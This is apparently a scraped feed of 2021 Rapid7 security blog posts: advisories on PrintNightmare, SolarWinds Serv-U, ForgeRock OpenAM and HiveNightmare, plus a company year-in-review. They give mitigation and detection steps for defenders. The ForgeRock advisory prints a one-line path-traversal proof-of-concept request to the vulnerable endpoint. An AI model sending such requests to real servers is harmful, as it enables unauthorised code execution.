Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-07-09T17:53:41", "type": "rapid7blog", "title": "Metasploit Wrap-up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T17:53:41", "id": "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "href": "https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:04:19", "description": "Now that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization's infrastructure secure \u2014 even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.\n\n## Emergent threats and vulnerability disclosures\n\nAs always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. 
Let's revisit some of the highlights.\n\n### Emergent threat reports\n\n * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)\n * [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\n * [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n * [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)\n\n### Vulnerability disclosures\n\n * [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)\n * [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * [CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)\n\n## Research and policy highlights\n\nThat's not all our Research team was up to in 2021. 
They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.\n\n * We published several reports on the state of cybersecurity, including:\n * Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)\n * Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)\n * Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)\n * We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. (Spoiler: It is.)\n * We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).\n * We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.\n * We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.\n\n## The Rapid7 family keeps growing\n\nThroughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.\n\n * [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.\n * [We teamed up with open-source platform 
Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.\n * [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.\n\n## Industry accolades\n\nWe're always thrilled to get industry recognition for the work we do helping protectors secure their organizations \u2014 and we had a few big nods to celebrate in 2021.\n\n * Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).\n * We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).\n * InsightIDR was recognized by Gartner as a [Leader in SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.\n * For its 2021 Dynamic Application Security Testing (DAST) Magic Quadrant, Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).\n\n## Keeping in touch\n\nClearly, we had a pretty busy 2021 \u2014 and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.\n\n * Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. 
Season 5 launches later this month!\n * Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).\n * Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).\n * Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).\n\nStay tuned for more great content, research, and much more in 2022!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-05T18:52:41", "type": "rapid7blog", "title": "Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2021-1675", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-34527", "CVE-2021-3546", "CVE-2021-36934", "CVE-2021-44228"], 
"modified": "2022-01-05T18:52:41", "id": "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "href": "https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T14:55:46", "description": "\n\n**Vulnerability note:** This blog originally referenced CVE-2020-1675, but members of the community noted the week of June 29 that the publicly available exploits that purported to exploit CVE-2021-1675 may in fact have been targeting a new vulnerability in the same function as CVE-2021-1675. This was later confirmed, and Microsoft issued a new CVE for what the research community originally thought was CVE-2021-1675. Defenders should now follow guidance and remediation information on the new vulnerability identifier, [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), instead.\n\nOn June 8, 2021, Microsoft released an advisory and patch for [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) (\u201cPrintNightmare\u201d), a critical vulnerability in the Windows Print Spooler. Although [originally classified](<https://www.rapid7.com/blog/post/2021/06/08/patch-tuesday-june-2021/>) as a privilege escalation vulnerability, security researchers have demonstrated that the vulnerability allows authenticated users to gain remote code execution with SYSTEM-level privileges. On June 29, 2021, as proof-of-concept exploits for the vulnerability began circulating, security researchers discovered that a vulnerability they thought to be CVE-2021-1675 was still exploitable on some systems that had been patched. As of July 1, at least three different proof-of-concept exploits [had been made public](<https://github.com/afwu/PrintNightmare>).\n\nRapid7 researchers confirmed that public exploits worked against fully patched Windows Server 2019 installations as of July 1, 2021. 
The vulnerable service is enabled by default on Windows Server, with the exception of Windows Server Core. Therefore, it is expected that in the vast majority of enterprise environments, Windows systems are vulnerable to remote code execution by authenticated attackers.\n\nThe vulnerability is in the `RpcAddPrinterDriver` call of the Windows Print Spooler. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB. The client then allocates a `DRIVER_INFO_2` object and initializes a `DRIVER_CONTAINER` object that contains the allocated `DRIVER_INFO_2` object. The `DRIVER_CONTAINER` object is then used within the call to `RpcAddPrinterDriver` to load the driver. This driver may contain arbitrary code that will be executed with SYSTEM privileges on the victim server. This command can be executed by any user who can authenticate to the Spooler service.\n\n## Updates\n\n**9 July 2021**: Microsoft [released revised guidance on CVE-2021-34527](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) the evening of July 8. According to the Microsoft Security Response Center, the out-of-band security update "is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration." 
This is consistent with Microsoft's emphasis earlier in the week that the out-of-band update effectively remediates CVE-2021-34527 **as long as Point and Print is not enabled.**\n\nThe [updated guidance from July 8, 2021](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) also contains revisions to the registry keys that must be set to `0` (or must not be present) in order to ensure that Point and Print is disabled in customer environments. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` and\n * `NoWarningNoElevationOnUpdate = 0`\n\n**However, as of July 8, 2021, one of the registry keys that must be set to a 0 (zero) value has changed.** Current guidance is that Point and Print can be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n\nWe have updated the `Mitigation Guidance` section in this post to reflect the latest remediation guidance from Microsoft. Further details can still be found in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>).\n\n**7 July 2021**: Microsoft released out-of-band updates for some (but not all) versions of Windows the evening of July 6, 2021. 
According to Microsoft's updated advisory, "the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as \u201cPrintNightmare\u201d, documented in CVE-2021-34527." Exploitation in the wild has been detected, and ALL Windows systems are affected\u2014not just domain controllers.\n\n**As of July 7, 2021, multiple community researchers have disputed the efficacy of Microsoft's out-of-band fixes for CVE-2021-34527, noting that the local privilege escalation (LPE) vector may not have been addressed, and while the July 6 updates may have remediated the original MS-RPRN vector for remote code execution, RCE is [still possible using MS-PAR](<https://twitter.com/gentilkiwi/status/1411792763478233091>) with Point and Print enabled.** Several prominent researchers have tested ongoing exploitability, including [Will Dormann of CERT/CC](<https://twitter.com/wdormann/status/1412813044279910416>) and Mimikatz developer [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1412771368534528001>). 
Dormann [tweeted](<https://twitter.com/wdormann/status/1412813044279910416>) on July 7, 2021 just after noon EDT that "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE."\n\nRapid7 researchers have confirmed that Metasploit and other public proof-of-concept code is still able to achieve remote code execution using both MS-RPRN and the UNC path bypass _as long as Point and Print is enabled._ When Point and Print is disabled using the guidance below, public exploit code fails to achieve remote code execution.\n\nTo fully remediate PrintNightmare CVE-2021-34527, Windows administrators should review Microsoft's guidance in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>), install the out-of-band updates released July 6, 2021, and disable Point and Print. Microsoft also recommends restricting non-administrators from installing any signed or unsigned printer drivers on printer servers. See the **Mitigation Guidance** section below for detailed guidance.\n\n**6 July 2021**: Since this blog was initially posted, additional information has become available. Microsoft has issued a new advisory and assigned a new CVE ID to the PrintNightmare vulnerability: [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \nThe new guidance recommends disabling the print spooler, as we initially recommended, and also contains instructions to disable inbound remote printing through Group Policy.\n\nThese are only workarounds and a patch remains unavailable at this time. \nSince this vulnerability has no patch and multiple proofs-of-concept are freely available, we recommend implementing a workaround mitigation as soon as possible. 
We advise following one of the two workarounds on all Domain Controllers and any other Windows machines\u2014servers or clients\u2014which meet either of the following criteria:\n\n 1. Point and Print is enabled\n 2. The Authenticated Users group is nested within any of the groups that are listed in the [mitigation section of Microsoft's advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\nFrom a technical standpoint, additional information from Cube0x0 and Benjamin Delpy suggests that `RpcAddPrinterDriver` is not the only vulnerable function, and that the Win32 `AddPrinterDriverEx` function is also affected. Some proofs of concept used only the RPRN `RpcAddPrinterDriver` function and did not work on certain machines; others have been demonstrated to work on servers and clients other than domain controllers using `AddPrinterDriverEx`. This has also been referred to as "SharpPrintNightmare".\n\n## Mitigation Guidance\n\nUp until July 6, 2021, the most effective mitigation strategy was to disable the print spooler service itself. Since July 6, Microsoft's guidance on remediating CVE-2021-34527 has undergone several revisions. Updated mitigation guidance is below, and we have also preserved our original guidance on disabling the print spooler service. The Microsoft Security Response Center [published a blog](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) with the details below on July 8, 2021.\n\n**As of July 9, 2021:** \nTo fully remediate CVE-2021-34527, Windows administrators should review Microsoft's guidance in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) and do the following:\n\n 1. Install the cumulative update released July 6, 2021.\n 2. 
Disable Point and Print by setting the following registry keys to `0` (or ensuring they are not present):\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n 3. Configure the `RestrictDriverInstallationToAdministrators` registry value to prevent non-administrators from installing printer drivers on a print server. Setting this value to 1 or any non-zero value prevents a non-administrator from installing any signed or unsigned printer driver on a printer server. Administrators can install both a signed or unsigned printer driver on a print server.\n\n**Note:** This guidance has been revised and reflects new information published by Microsoft on July 8, 2021. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` and `NoWarningNoElevationOnUpdate` registry keys to `0`. As of July 9, 2021, this information is outdated and Windows customers should use the [revised guidance](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>).\n\nAfter installing the July 2021 out-of-band update, all users will be either administrators or non-administrators. Delegates will no longer be honored. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for further information.\n\nIf your organization does not require printing to conduct business operations, you may also disable the print spooler service. This should be done on all endpoints, servers, and especially domain controllers. 
Dedicated print servers may still be vulnerable if the spooler is not stopped. Microsoft [security guidelines](<https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server#print-spooler>) do not recommend disabling the service across all domain controllers, since the active directory has no way to remove old queues that no longer exist unless the spooler service is running on at least one domain controller in each site. However, until this vulnerability is effectively patched, this should have limited impact compared to the risk.\n\nOn Windows cmd:\n \n \n net stop spooler\n \n\nOn PowerShell:\n \n \n Stop-Service -Name Spooler -Force\n Set-Service -Name Spooler -StartupType Disabled\n \n\nThe following PowerShell commands can be used to help find exploitation attempts:\n \n \n Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin' | Select-String -InputObject {$_.message} -Pattern 'The print spooler failed to load a plug-in module'\n \n \n \n Get-WinEvent -FilterHashtable @{Logname='Microsoft-Windows-PrintService/Operational';ID=316} | Select-Object *\n \n\n## Rapid7 Customers\n\nWe strongly recommend that all customers either install the July 6, 2021 out-of-band updates **and** disable Point and Print via the two registry keys detailed in the `Mitigation Guidance` section above, **OR** disable the Windows Print Spooler service altogether on an emergency basis to mitigate the immediate risk of exploitation. InsightVM and Nexpose customers can assess their exposure to CVE-2021-34527 with authenticated checks in the July 8, 2021 content release. Checks look for the out-of-band patches Microsoft issued on July 6, 2021 and additionally ensure that Point and Print has been disabled in customer environments. 
InsightVM and Nexpose checks for CVE-2021-1675 were [released earlier in June](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-1675/>).\n\nVelociraptor users can use [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmare/>) and [this monitoring artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmaremonitor/>) to hunt for .dll files dropped during PrintNightmare exploitation. An exploit module is also available to Metasploit Pro customers.\n\nWe will continue to update this blog as further information comes to light.", "cvss3": {}, "published": "2021-06-30T18:15:59", "type": "rapid7blog", "title": "CVE-2021-34527 (PrintNightmare): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1675", "CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-06-30T18:15:59", "id": "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "href": "https://blog.rapid7.com/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T22:56:36", "description": "\n\nOn July 12, 2021, SolarWinds confirmed an actively exploited zero-day vulnerability, CVE-2021-35211, in the Serv-U FTP and Managed File Transfer component of SolarWinds 15.2.3 HF1 (released May 5, 2021) and all prior versions. Successful exploitation of CVE-2021-35211 could enable an attacker to gain remote code execution on a vulnerable target system. The vulnerability only exists when SSH is enabled in the Serv-U environment.\n\nA [hotfix for the vulnerability is available](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), and **we recommend all customers of SolarWinds Serv-U FTP and Managed File Transfer install this hotfix immediately** (or, at minimum, disable SSH for a temporary mitigation). 
SolarWinds has emphasized that CVE-2021-35211 only affects Serv-U Managed File Transfer and Serv-U Secure FTP and does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. For further details, see [SolarWinds\u2019s advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n## Details\n\nThe SolarWinds advisory cites threat intelligence provided by Microsoft. According to Microsoft, a single threat actor unrelated to this year\u2019s earlier [SUNBURST intrusions](<https://www.rapid7.com/blog/post/2020/12/14/solarwinds-sunburst-backdoor-supply-chain-attack-what-you-need-to-know/>) has exploited the vulnerability against a limited, targeted population of SolarWinds customers. The vulnerability exists in all versions of Serv-U 15.2.3 HF1 and earlier. Though Microsoft provided a proof-of-concept exploit to SolarWinds, there are no public proofs-of-concept as of July 12, 2021.\n\nThe vulnerability appears to be in the exception handling functionality in a portion of the software related to processing connections on open sockets. Successful exploitation of the vulnerability will cause the Serv-U product to throw an exception, then will overwrite the exception handler with the attacker\u2019s code, causing remote code execution.\n\n## Detection\n\nSince the vulnerability is in the exception handler, looking for exceptions in the `DebugSocketLog.txt` file may help identify exploitation attempts. 
Note, however, that exceptions can be thrown for many reasons and the presence of an exception in the log does not guarantee that there has been an exploitation attempt.\n\nIP addresses used by the threat actor include:\n \n \n 98.176.196.89 \n 68.235.178.32 \n 208.113.35.58\n \n\nRapid7 does not use SolarWinds Serv-U FTP products anywhere in our environment and is not affected by CVE-2021-35211.\n\nFor further information, see [Solarwinds\u2019s FAQ here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211#FAQ>).", "cvss3": {}, "published": "2021-07-12T22:39:41", "type": "rapid7blog", "title": "SolarWinds Serv-U FTP and Managed File Transfer CVE-2021-35211: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-12T22:39:41", "id": "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362", "href": "https://blog.rapid7.com/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-30T16:55:19", "description": "\n\nOn June 29, 2021, security researcher Michael Stepankin ([@artsploit](<https://twitter.com/artsploit>)) [posted details](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>) of [CVE-2021-35464](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-openam-cve-2021-35464>), a pre-auth remote code execution (RCE) vulnerability in ForgeRock [Access Manager](<https://www.forgerock.com/blog/tag/openam>) identity and access management software. 
ForgeRock front-ends web applications and remote access solutions in many enterprises.\n\nForgeRock has issued [Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/book/b21824339#a47894244>) to provide information on this vulnerability and will be updating it if and when patches are available.\n\nThe weakness exists due to unsafe object deserialization via the [Jato framework](<https://docs.oracle.com/cd/E19454-01/819-0728/overview.html>), with a disturbingly diminutive proof of concept that requires a single `GET`/`POST` request for code execution:\n \n \n GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>\n \n\nForgeRock versions below 7.0 running on Java 8 are vulnerable, and the weakness also exists in unpatched versions of the Open Identity Platform\u2019s [fork of OpenAM](<https://github.com/OpenIdentityPlatform/OpenAM>). ForgeRock/OIP installations running on Java 9 or higher are unaffected.\n\nAs of July 29, 2021 there are no patches for existing versions of ForgeRock Access Manager. Organizations must either upgrade to version 7.x or apply one of the following workarounds:\n\n**Option 1**\n\nDisable the VersionServlet mapping by commenting out the following section in the AM web.xml file (located in the `/path/to/tomcat/webapps/openam/WEB-INF` directory):\n \n \n <servlet-mapping> \n <servlet-name>VersionServlet</servlet-name> \n <url-pattern>/ccversion/*</url-pattern> \n </servlet-mapping>\n \n\nTo comment out the above section, apply the following changes to the web.xml file:\n \n \n <!-- \n <servlet-mapping> \n <servlet-name>VersionServlet</servlet-name> \n <url-pattern>/ccversion/*</url-pattern> \n </servlet-mapping>\n -->\n \n\n**Option 2**\n\nBlock access to the `ccversion` endpoint using a reverse proxy or other method. 
On Apache Tomcat, ensure that access rules cannot be bypassed using known path traversal issues: [Tomcat path traversal via reverse proxy mapping](<https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/>).\n\nThe upgrades remove the vulnerable `/ccversion` HTTP endpoint along with other HTTP paths that used the vulnerable Jato framework.\n\nAs of Tuesday, June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock\u2019s OpenAM solution.\n\nAll organizations running ForgeRock OpenAM 7.0.x or lower (or using the latest release of the Open Identity Platform\u2019s fork of OpenAM) are urged to prioritize upgrading or applying the mitigations within an accelerated patch window if possible, and at the very least within the 30-day window if you are following the typical 30-60-90 day patch criticality cadence. Furthermore, organizations that are monitoring web application logs and OpenAM server logs should look for anomalous `GET` or `POST` request volume to HTTP path endpoints that include `/ccversion` in them.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-openam-cve-2021-35464?referrer=blog#rapid7-analysis>).\n\nThis blog post will be updated with new information as warranted.\n\n_Header image photo by [Hannah Gibbs](<https://unsplash.com/@hannahmgibbs?utmsource=unsplash&utmmedium=referral&utmcontent=creditCopyText>) on [Unsplash](<https://unsplash.com/s/photos/forge?utmsource=unsplash&utmmedium=referral&utmcontent=creditCopyText>)_", "cvss3": {}, "published": "2021-06-30T15:26:49", "type": "rapid7blog", "title": "ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464): What You Need To Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-06-30T15:26:49", "id": 
"RAPID7BLOG:5223F0ED8D616DB4EE860CF6B7770388", "href": "https://blog.rapid7.com/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-31T08:56:21", "description": "\n\nOn Monday, July 19, 2021, community security researchers began [reporting](<https://twitter.com/jonasLyk/status/1417205166172950531>) that the Security Account Manager (SAM) file on Windows 10 and 11 systems was READ-enabled for all local users. The SAM file is used to store sensitive security information, such as hashed user and admin passwords. READ enablement means attackers with a foothold on the system can use this security-related information to escalate privileges or access other data in the target environment.\n\nOn Tuesday, July 20, Microsoft issued an out-of-band advisory for this vulnerability, which is now tracked as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). As of July 22, 2021, the vulnerability has been confirmed to affect Windows 10 version 1809 and later. A public proof-of-concept is available that allows non-admin users to retrieve all registry hives. Researcher Kevin Beaumont has also [released a demo](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>) that confirms CVE-2021-36934 can be used to obtain local hashes and pass them to a remote machine, achieving remote code execution as SYSTEM on arbitrary targets (in addition to privilege escalation). The security community has christened this vulnerability \u201cHiveNightmare\u201d and \u201cSeriousSAM.\u201d\n\nCERT/CC [published in-depth vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>) on CVE-2021-36934, which we highly recommend reading. 
Their analysis reveals that starting with Windows 10 build 1809, the BUILTIN\\Users group is given RX permissions to files in the `%windir%\\system32\\config` directory. If a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\n**There is no patch for CVE-2021-36934 as of July 21, 2021.** Microsoft has released workarounds for Windows 10 and 11 customers that mitigate the risk of immediate exploitation\u2014we have reproduced these workarounds in the `Mitigation Guidance` section below. Please note that Windows customers must **BOTH** restrict access and delete shadow copies to prevent exploitation of CVE-2021-36934. We recommend applying the workarounds on an emergency basis.\n\n## Mitigation Guidance\n\n**1\\. Restrict access to the contents of `%windir%\\system32\\config`:**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\n**2\\. Delete Volume Shadow Copy Service (VSS) shadow copies:**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point if desired.\n\n**Windows 10 and 11 users must apply both workarounds to mitigate the risk of exploitation.** Microsoft has noted that deleting shadow copies may impact restore operations, including the ability to restore data with third-party backup applications.\n\nThis story is developing quickly. 
